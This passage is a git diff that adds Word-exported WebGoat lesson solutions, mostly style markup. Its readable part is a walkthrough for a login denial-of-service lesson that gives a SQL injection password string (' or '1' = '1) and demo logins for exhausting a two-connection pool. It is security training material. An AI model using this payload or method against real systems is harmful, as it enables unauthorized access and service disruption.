+   UnhideWhenUsed="false" Name="Colorful Grid Accent 4"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading Accent 5"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List Accent 5"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid Accent 5"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 5"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 5"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1 Accent 5"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2 Accent 5"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 5"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 5"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 5"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List Accent 5"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading Accent 5"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List Accent 5"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid Accent 5"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading Accent 6"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List Accent 6"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid Accent 6"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 6"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 6"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1 Accent 6"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2 Accent 6"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 6"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 6"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 6"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List Accent 6"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading Accent 6"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List Accent 6"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid Accent 6"/>
+  <w:LsdException Locked="false" Priority="19" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Subtle Emphasis"/>
+  <w:LsdException Locked="false" Priority="21" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Intense Emphasis"/>
+  <w:LsdException Locked="false" Priority="31" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Subtle Reference"/>
+  <w:LsdException Locked="false" Priority="32" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Intense Reference"/>
+  <w:LsdException Locked="false" Priority="33" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Book Title"/>
+  <w:LsdException Locked="false" Priority="37" Name="Bibliography"/>
+  <w:LsdException Locked="false" Priority="39" QFormat="true" Name="TOC Heading"/>
+ </w:LatentStyles>
+</xml><![endif]-->
+<style>
+<!--
+ /* Font Definitions */
+ @font-face
+	{font-family:"MS Mincho";
+	panose-1:2 2 6 9 4 2 5 8 3 4;
+	mso-font-alt:"\FF2D\FF33 \660E\671D";
+	mso-font-charset:128;
+	mso-generic-font-family:modern;
+	mso-font-pitch:fixed;
+	mso-font-signature:-1610612033 1757936891 16 0 131231 0;}
+@font-face
+	{font-family:"Cambria Math";
+	panose-1:2 4 5 3 5 4 6 3 2 4;
+	mso-font-charset:0;
+	mso-generic-font-family:roman;
+	mso-font-pitch:variable;
+	mso-font-signature:-1610611985 1107304683 0 0 159 0;}
+@font-face
+	{font-family:Cambria;
+	panose-1:2 4 5 3 5 4 6 3 2 4;
+	mso-font-charset:0;
+	mso-generic-font-family:roman;
+	mso-font-pitch:variable;
+	mso-font-signature:-1610611985 1073741899 0 0 159 0;}
+@font-face
+	{font-family:Tahoma;
+	panose-1:2 11 6 4 3 5 4 4 2 4;
+	mso-font-charset:0;
+	mso-generic-font-family:swiss;
+	mso-font-pitch:variable;
+	mso-font-signature:1627400839 -2147483648 8 0 66047 0;}
+@font-face
+	{font-family:"\@MS Mincho";
+	panose-1:2 2 6 9 4 2 5 8 3 4;
+	mso-font-charset:128;
+	mso-generic-font-family:modern;
+	mso-font-pitch:fixed;
+	mso-font-signature:-1610612033 1757936891 16 0 131231 0;}
+ /* Style Definitions */
+ p.MsoNormal, li.MsoNormal, div.MsoNormal
+	{mso-style-unhide:no;
+	mso-style-qformat:yes;
+	mso-style-parent:"";
+	margin:0cm;
+	margin-bottom:.0001pt;
+	mso-pagination:widow-orphan;
+	font-size:12.0pt;
+	font-family:"Times New Roman","serif";
+	mso-fareast-font-family:"Times New Roman";}
+h1
+	{mso-style-unhide:no;
+	mso-style-qformat:yes;
+	mso-style-link:"Heading 1 Char";
+	mso-style-next:Normal;
+	margin-top:12.0pt;
+	margin-right:0cm;
+	margin-bottom:3.0pt;
+	margin-left:0cm;
+	mso-pagination:widow-orphan;
+	page-break-after:avoid;
+	mso-outline-level:1;
+	font-size:16.0pt;
+	font-family:"Arial","sans-serif";
+	mso-fareast-font-family:"MS Mincho";
+	mso-font-kerning:16.0pt;
+	mso-fareast-language:JA;
+	font-weight:bold;}
+h2
+	{mso-style-noshow:yes;
+	mso-style-priority:9;
+	mso-style-qformat:yes;
+	mso-style-link:"Heading 2 Char";
+	mso-style-next:Normal;
+	margin-top:10.0pt;
+	margin-right:0cm;
+	margin-bottom:0cm;
+	margin-left:0cm;
+	margin-bottom:.0001pt;
+	mso-pagination:widow-orphan lines-together;
+	page-break-after:avoid;
+	mso-outline-level:2;
+	font-size:13.0pt;
+	font-family:"Cambria","serif";
+	mso-ascii-font-family:Cambria;
+	mso-ascii-theme-font:major-latin;
+	mso-fareast-font-family:"Times New Roman";
+	mso-fareast-theme-font:major-fareast;
+	mso-hansi-font-family:Cambria;
+	mso-hansi-theme-font:major-latin;
+	mso-bidi-font-family:"Times New Roman";
+	mso-bidi-theme-font:major-bidi;
+	color:#4F81BD;
+	mso-themecolor:accent1;
+	font-weight:bold;}
+p.MsoCaption, li.MsoCaption, div.MsoCaption
+	{mso-style-noshow:yes;
+	mso-style-qformat:yes;
+	mso-style-next:Normal;
+	margin:0cm;
+	margin-bottom:.0001pt;
+	mso-pagination:widow-orphan;
+	font-size:10.0pt;
+	font-family:"Times New Roman","serif";
+	mso-fareast-font-family:"Times New Roman";
+	font-weight:bold;}
+p.MsoEnvelopeReturn, li.MsoEnvelopeReturn, div.MsoEnvelopeReturn
+	{mso-style-noshow:yes;
+	mso-style-priority:99;
+	margin:0cm;
+	margin-bottom:.0001pt;
+	mso-pagination:widow-orphan;
+	font-size:12.0pt;
+	font-family:"Times New Roman","serif";
+	mso-fareast-font-family:"Times New Roman";
+	mso-fareast-theme-font:major-fareast;}
+a:link, span.MsoHyperlink
+	{mso-style-noshow:yes;
+	color:blue;
+	text-decoration:underline;
+	text-underline:single;}
+a:visited, span.MsoHyperlinkFollowed
+	{mso-style-noshow:yes;
+	mso-style-priority:99;
+	color:purple;
+	mso-themecolor:followedhyperlink;
+	text-decoration:underline;
+	text-underline:single;}
+p
+	{mso-style-noshow:yes;
+	mso-style-priority:99;
+	mso-margin-top-alt:auto;
+	margin-right:0cm;
+	mso-margin-bottom-alt:auto;
+	margin-left:0cm;
+	mso-pagination:widow-orphan;
+	font-size:12.0pt;
+	font-family:"Times New Roman","serif";
+	mso-fareast-font-family:"Times New Roman";}
+p.MsoAcetate, li.MsoAcetate, div.MsoAcetate
+	{mso-style-noshow:yes;
+	mso-style-priority:99;
+	mso-style-link:"Balloon Text Char";
+	margin:0cm;
+	margin-bottom:.0001pt;
+	mso-pagination:widow-orphan;
+	font-size:8.0pt;
+	font-family:"Tahoma","sans-serif";
+	mso-fareast-font-family:"Times New Roman";}
+span.Heading1Char
+	{mso-style-name:"Heading 1 Char";
+	mso-style-unhide:no;
+	mso-style-locked:yes;
+	mso-style-link:"Heading 1";
+	mso-ansi-font-size:16.0pt;
+	mso-bidi-font-size:16.0pt;
+	font-family:"MS Mincho";
+	mso-ascii-font-family:"MS Mincho";
+	mso-fareast-font-family:"MS Mincho";
+	mso-hansi-font-family:"MS Mincho";
+	mso-bidi-font-family:Arial;
+	mso-font-kerning:16.0pt;
+	mso-fareast-language:JA;
+	font-weight:bold;}
+span.Heading2Char
+	{mso-style-name:"Heading 2 Char";
+	mso-style-noshow:yes;
+	mso-style-priority:9;
+	mso-style-unhide:no;
+	mso-style-locked:yes;
+	mso-style-link:"Heading 2";
+	mso-ansi-font-size:13.0pt;
+	mso-bidi-font-size:13.0pt;
+	font-family:"Cambria","serif";
+	mso-ascii-font-family:Cambria;
+	mso-ascii-theme-font:major-latin;
+	mso-fareast-font-family:"Times New Roman";
+	mso-fareast-theme-font:major-fareast;
+	mso-hansi-font-family:Cambria;
+	mso-hansi-theme-font:major-latin;
+	color:#4F81BD;
+	mso-themecolor:accent1;
+	font-weight:bold;}
+span.BalloonTextChar
+	{mso-style-name:"Balloon Text Char";
+	mso-style-noshow:yes;
+	mso-style-priority:99;
+	mso-style-unhide:no;
+	mso-style-locked:yes;
+	mso-style-link:"Balloon Text";
+	mso-ansi-font-size:8.0pt;
+	mso-bidi-font-size:8.0pt;
+	font-family:"Tahoma","sans-serif";
+	mso-ascii-font-family:Tahoma;
+	mso-fareast-font-family:"Times New Roman";
+	mso-hansi-font-family:Tahoma;
+	mso-bidi-font-family:Tahoma;}
+.MsoChpDefault
+	{mso-style-type:export-only;
+	mso-default-props:yes;
+	font-size:10.0pt;
+	mso-ansi-font-size:10.0pt;
+	mso-bidi-font-size:10.0pt;
+	mso-ascii-font-family:Arial;
+	mso-fareast-font-family:Calibri;
+	mso-fareast-theme-font:minor-latin;
+	mso-hansi-font-family:Arial;
+	mso-bidi-font-family:"Times New Roman";
+	mso-bidi-theme-font:major-bidi;}
+@page Section1
+	{size:612.0pt 792.0pt;
+	margin:72.0pt 72.0pt 72.0pt 72.0pt;
+	mso-header-margin:35.4pt;
+	mso-footer-margin:35.4pt;
+	mso-paper-source:0;}
+div.Section1
+	{page:Section1;}
+-->
+</style>
+<!--[if gte mso 10]>
+<style>
+ /* Style Definitions */
+ table.MsoNormalTable
+	{mso-style-name:"Table Normal";
+	mso-tstyle-rowband-size:0;
+	mso-tstyle-colband-size:0;
+	mso-style-noshow:yes;
+	mso-style-priority:99;
+	mso-style-qformat:yes;
+	mso-style-parent:"";
+	mso-padding-alt:0cm 5.4pt 0cm 5.4pt;
+	mso-para-margin:0cm;
+	mso-para-margin-bottom:.0001pt;
+	mso-pagination:widow-orphan;
+	font-size:10.0pt;
+	font-family:"Arial","sans-serif";
+	mso-bidi-font-family:"Times New Roman";
+	mso-bidi-theme-font:major-bidi;}
+</style>
+<![endif]--><!--[if gte mso 9]><xml>
+ <o:shapedefaults v:ext="edit" spidmax="4098"/>
+</xml><![endif]--><!--[if gte mso 9]><xml>
+ <o:shapelayout v:ext="edit">
+  <o:idmap v:ext="edit" data="1"/>
+ </o:shapelayout></xml><![endif]-->
+</head>
+
+<body lang=EN-US link=blue vlink=purple style='tab-interval:36.0pt'>
+
+<div class=Section1>
+
+<p class=MsoNormal><b><span style='font-family:"Arial","sans-serif"'>Lesson
+Plan Title:</span></b><span style='font-family:"Arial","sans-serif"'> Denial of
+Service from Multiple Logins<o:p></o:p></span></p>
+
+<p class=MsoNormal><b><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></b></p>
+
+<p class=MsoNormal><b><span style='font-family:"Arial","sans-serif"'>Concept /
+Topic To Teach:</span></b><span style='font-family:"Arial","sans-serif"'> <o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>Denial of
+service attacks are a major issue in web applications. If the end user cannot conduct
+business or perform the service offered by the web application, then both time
+and money is wasted. <o:p></o:p></span></p>
+
+<p class=MsoNormal><b><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></b></p>
+
+<p class=MsoNormal><b><span style='font-family:"Arial","sans-serif"'>General
+Goal(s):</span></b><span style='font-family:"Arial","sans-serif"'> <o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>This site
+allows a user to login multiple times. This site has a database connection pool
+that allows 2 connections. You must obtain a list of valid users and create a
+total of 3 logins.<o:p></o:p></span></p>
+
+<h2><span style='color:windowtext'>Solution:<o:p></o:p></span></h2>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>This site
+allows a user to login multiple times. There is a database connection pool that
+allows 2 connections. You must obtain a list of valid users and create a total
+of 3 logins.<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>Let’s try a
+SQL Injection attack. Enter in the password field ' or '1' = '1<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal style='page-break-after:avoid'><span style='font-family:
+"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shapetype id="_x0000_t75"
+ coordsize="21600,21600" o:spt="75" o:preferrelative="t" path="m@4@5l@4@11@9@11@9@5xe"
+ filled="f" stroked="f">
+ <v:stroke joinstyle="miter"/>
+ <v:formulas>
+  <v:f eqn="if lineDrawn pixelLineWidth 0"/>
+  <v:f eqn="sum @0 1 0"/>
+  <v:f eqn="sum 0 0 @1"/>
+  <v:f eqn="prod @2 1 2"/>
+  <v:f eqn="prod @3 21600 pixelWidth"/>
+  <v:f eqn="prod @3 21600 pixelHeight"/>
+  <v:f eqn="sum @0 0 1"/>
+  <v:f eqn="prod @6 1 2"/>
+  <v:f eqn="prod @7 21600 pixelWidth"/>
+  <v:f eqn="sum @8 21600 0"/>
+  <v:f eqn="prod @7 21600 pixelHeight"/>
+  <v:f eqn="sum @10 21600 0"/>
+ </v:formulas>
+ <v:path o:extrusionok="f" gradientshapeok="t" o:connecttype="rect"/>
+ <o:lock v:ext="edit" aspectratio="t"/>
+</v:shapetype><v:shape id="Picture_x0020_9" o:spid="_x0000_i1026" type="#_x0000_t75"
+ style='width:480pt;height:277.5pt;visibility:visible;mso-wrap-style:square'>
+ <v:imagedata src="/WebGoat/lesson_solutions/DOS_Login_files/image001.png" o:title=""/>
+</v:shape><![endif]--><![if !vml]><img width=640 height=370
+src="/WebGoat/lesson_solutions/DOS_Login_files/image002.jpg" v:shapes="Picture_x0020_9"><![endif]></span></p>
+
+<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
+field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
+<span style='mso-element:field-separator'></span><![endif]--><span
+style='mso-no-proof:yes'>1</span><!--[if supportFields]><span style='mso-element:
+field-end'></span><![endif]--> Lesson 20</p>
+
+<p class=MsoNormal><o:p>&nbsp;</o:p></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>Login with
+user name jsnow and password passwd1. Then login with user name jdoe and
+password passwd1. And finally login with jplane and passwd3. <o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal style='page-break-after:avoid'><span style='font-family:
+"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_10"
+ o:spid="_x0000_i1025" type="#_x0000_t75" style='width:480pt;height:277.5pt;
+ visibility:visible;mso-wrap-style:square'>
+ <v:imagedata src="/WebGoat/lesson_solutions/DOS_Login_files/image003.png" o:title=""/>
+</v:shape><![endif]--><![if !vml]><img width=640 height=370
+src="/WebGoat/lesson_solutions/DOS_Login_files/image004.jpg" v:shapes="Picture_x0020_10"><![endif]></span></p>
+
+<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
+field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
+<span style='mso-element:field-separator'></span><![endif]--><span
+style='mso-no-proof:yes'>2</span><!--[if supportFields]><span style='mso-element:
+field-end'></span><![endif]--> Lesson 20 Completed<span style='font-family:
+"Arial","sans-serif"'><o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal><o:p>&nbsp;</o:p></p>
+
+</div>
+<table align='RIGHT' cellspacing='0' width='90%' border='0' cellpadding='0'>
+	<tr>
+		<td valign='MIDDLE' width='100%' align='RIGHT class=MsoNormal' style='font-family:"Arial","sans-serif"'>
+			Solution by Erwin Geirnaert 
+		</td>
+		<td valign='MIDDLE' align='RIGHT'><img hspace='0' vspace='0' border='0' alt='ZION SECURITY' src='images/logos/zionsecurity.gif'></td>
+	</tr>
+</table>
+
+
+</body>
+
+</html>
diff --git a/main/project/WebContent/lesson_solutions/DOS_Login_files/colorschememapping.xml b/main/project/WebContent/lesson_solutions/DOS_Login_files/colorschememapping.xml
new file mode 100644
index 000000000..b200daa38
--- /dev/null
+++ b/main/project/WebContent/lesson_solutions/DOS_Login_files/colorschememapping.xml
@@ -0,0 +1,2 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<a:clrMap xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" bg1="lt1" tx1="dk1" bg2="lt2" tx2="dk2" accent1="accent1" accent2="accent2" accent3="accent3" accent4="accent4" accent5="accent5" accent6="accent6" hlink="hlink" folHlink="folHlink"/>
\ No newline at end of file
diff --git a/main/project/WebContent/lesson_solutions/DOS_Login_files/filelist.xml b/main/project/WebContent/lesson_solutions/DOS_Login_files/filelist.xml
new file mode 100644
index 000000000..065d671e4
--- /dev/null
+++ b/main/project/WebContent/lesson_solutions/DOS_Login_files/filelist.xml
@@ -0,0 +1,10 @@
+<xml xmlns:o="urn:schemas-microsoft-com:office:office">
+ <o:MainFile HRef="../DOS_Login.html"/>
+ <o:File HRef="themedata.thmx"/>
+ <o:File HRef="colorschememapping.xml"/>
+ <o:File HRef="image001.png"/>
+ <o:File HRef="image002.jpg"/>
+ <o:File HRef="image003.png"/>
+ <o:File HRef="image004.jpg"/>
+ <o:File HRef="filelist.xml"/>
+</xml>
\ No newline at end of file
diff --git a/main/project/WebContent/lesson_solutions/DOS_Login_files/image001.png b/main/project/WebContent/lesson_solutions/DOS_Login_files/image001.png
new file mode 100644
index 000000000..dc2669fe2
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/DOS_Login_files/image001.png differ
diff --git a/main/project/WebContent/lesson_solutions/DOS_Login_files/image002.jpg b/main/project/WebContent/lesson_solutions/DOS_Login_files/image002.jpg
new file mode 100644
index 000000000..6f5c75387
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/DOS_Login_files/image002.jpg differ
diff --git a/main/project/WebContent/lesson_solutions/DOS_Login_files/image003.png b/main/project/WebContent/lesson_solutions/DOS_Login_files/image003.png
new file mode 100644
index 000000000..45396104d
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/DOS_Login_files/image003.png differ
diff --git a/main/project/WebContent/lesson_solutions/DOS_Login_files/image004.jpg b/main/project/WebContent/lesson_solutions/DOS_Login_files/image004.jpg
new file mode 100644
index 000000000..372cdca56
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/DOS_Login_files/image004.jpg differ
diff --git a/main/project/WebContent/lesson_solutions/DOS_Login_files/themedata.thmx b/main/project/WebContent/lesson_solutions/DOS_Login_files/themedata.thmx
new file mode 100644
index 000000000..55426d8ec
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/DOS_Login_files/themedata.thmx differ
diff --git a/main/project/WebContent/lesson_solutions/FailOpenAuthentication.html b/main/project/WebContent/lesson_solutions/FailOpenAuthentication.html
new file mode 100644
index 000000000..e390225f3
--- /dev/null
+++ b/main/project/WebContent/lesson_solutions/FailOpenAuthentication.html
@@ -0,0 +1,741 @@
+<html xmlns:v="urn:schemas-microsoft-com:vml"
+xmlns:o="urn:schemas-microsoft-com:office:office"
+xmlns:w="urn:schemas-microsoft-com:office:word"
+xmlns:m="http://schemas.microsoft.com/office/2004/12/omml"
+xmlns="http://www.w3.org/TR/REC-html40">
+
+<head>
+<meta http-equiv=Content-Type content="text/html; charset=windows-1252">
+<meta name=ProgId content=Word.Document>
+<meta name=Generator content="Microsoft Word 12">
+<meta name=Originator content="Microsoft Word 12">
+<link rel=File-List href="/WebGoat/lesson_solutions/FailOpenAuthentication_files/filelist.xml">
+<link rel=Edit-Time-Data href="/WebGoat/lesson_solutions/FailOpenAuthentication_files/editdata.mso">
+<!--[if !mso]>
+<style>
+v\:* {behavior:url(#default#VML);}
+o\:* {behavior:url(#default#VML);}
+w\:* {behavior:url(#default#VML);}
+.shape {behavior:url(#default#VML);}
+</style>
+<![endif]--><!--[if gte mso 9]><xml>
+ <o:DocumentProperties>
+  <o:Author>egeirnaert</o:Author>
+  <o:LastAuthor>egeirnaert</o:LastAuthor>
+  <o:Revision>3</o:Revision>
+  <o:TotalTime>38</o:TotalTime>
+  <o:Created>2007-07-11T14:02:00Z</o:Created>
+  <o:LastSaved>2007-07-12T15:34:00Z</o:LastSaved>
+  <o:Pages>2</o:Pages>
+  <o:Words>181</o:Words>
+  <o:Characters>1033</o:Characters>
+  <o:Company> </o:Company>
+  <o:Lines>8</o:Lines>
+  <o:Paragraphs>2</o:Paragraphs>
+  <o:CharactersWithSpaces>1212</o:CharactersWithSpaces>
+  <o:Version>12.00</o:Version>
+ </o:DocumentProperties>
+</xml><![endif]-->
+<link rel=themeData href="/WebGoat/lesson_solutions/FailOpenAuthentication_files/themedata.thmx">
+<link rel=colorSchemeMapping
+href="/WebGoat/lesson_solutions/FailOpenAuthentication_files/colorschememapping.xml">
+<!--[if gte mso 9]><xml>
+ <w:WordDocument>
+  <w:Zoom>90</w:Zoom>
+  <w:TrackMoves>false</w:TrackMoves>
+  <w:TrackFormatting/>
+  <w:PunctuationKerning/>
+  <w:ValidateAgainstSchemas/>
+  <w:SaveIfXMLInvalid>false</w:SaveIfXMLInvalid>
+  <w:IgnoreMixedContent>false</w:IgnoreMixedContent>
+  <w:AlwaysShowPlaceholderText>false</w:AlwaysShowPlaceholderText>
+  <w:DoNotPromoteQF/>
+  <w:LidThemeOther>EN-US</w:LidThemeOther>
+  <w:LidThemeAsian>X-NONE</w:LidThemeAsian>
+  <w:LidThemeComplexScript>X-NONE</w:LidThemeComplexScript>
+  <w:Compatibility>
+   <w:BreakWrappedTables/>
+   <w:SnapToGridInCell/>
+   <w:WrapTextWithPunct/>
+   <w:UseAsianBreakRules/>
+   <w:DontGrowAutofit/>
+   <w:SplitPgBreakAndParaMark/>
+   <w:DontVertAlignCellWithSp/>
+   <w:DontBreakConstrainedForcedTables/>
+   <w:DontVertAlignInTxbx/>
+   <w:Word11KerningPairs/>
+   <w:CachedColBalance/>
+  </w:Compatibility>
+  <w:BrowserLevel>MicrosoftInternetExplorer4</w:BrowserLevel>
+  <m:mathPr>
+   <m:mathFont m:val="Cambria Math"/>
+   <m:brkBin m:val="before"/>
+   <m:brkBinSub m:val="--"/>
+   <m:smallFrac m:val="off"/>
+   <m:dispDef/>
+   <m:lMargin m:val="0"/>
+   <m:rMargin m:val="0"/>
+   <m:defJc m:val="centerGroup"/>
+   <m:wrapIndent m:val="1440"/>
+   <m:intLim m:val="subSup"/>
+   <m:naryLim m:val="undOvr"/>
+  </m:mathPr></w:WordDocument>
+</xml><![endif]--><!--[if gte mso 9]><xml>
+ <w:LatentStyles DefLockedState="false" DefUnhideWhenUsed="true"
+  DefSemiHidden="true" DefQFormat="false" DefPriority="99"
+  LatentStyleCount="267">
+  <w:LsdException Locked="false" Priority="0" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Normal"/>
+  <w:LsdException Locked="false" Priority="0" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="heading 1"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 2"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 3"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 4"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 5"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 6"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 7"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 8"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 9"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 1"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 2"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 3"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 4"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 5"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 6"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 7"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 8"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 9"/>
+  <w:LsdException Locked="false" Priority="0" QFormat="true" Name="caption"/>
+  <w:LsdException Locked="false" Priority="10" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Title"/>
+  <w:LsdException Locked="false" Priority="1" Name="Default Paragraph Font"/>
+  <w:LsdException Locked="false" Priority="11" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Subtitle"/>
+  <w:LsdException Locked="false" Priority="0" Name="Hyperlink"/>
+  <w:LsdException Locked="false" Priority="22" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Strong"/>
+  <w:LsdException Locked="false" Priority="20" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Emphasis"/>
+  <w:LsdException Locked="false" Priority="0" Name="Normal (Web)"/>
+  <w:LsdException Locked="false" Priority="59" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Table Grid"/>
+  <w:LsdException Locked="false" UnhideWhenUsed="false" Name="Placeholder Text"/>
+  <w:LsdException Locked="false" Priority="1" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="No Spacing"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading Accent 1"/>
